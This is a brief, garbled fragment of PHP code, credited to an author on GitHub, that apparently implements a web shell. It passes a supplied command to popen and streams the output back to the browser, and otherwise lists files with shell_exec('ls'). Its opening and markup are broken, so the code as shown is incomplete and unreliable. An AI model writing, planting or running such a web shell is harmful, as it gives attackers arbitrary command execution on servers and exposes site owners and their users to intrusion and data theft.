// Author : Mohammed Ajmal // github.com/cooliscool // GNU Public License &1'; while (@ ob_end_flush()); $proc = popen($comm, 'r'); echo "
";
while(!feof($proc)){
echo fread($proc,4096);
@ flush();
}
echo " ";
}
else{
$output= shell_exec('ls');
echo "$output"; } ?>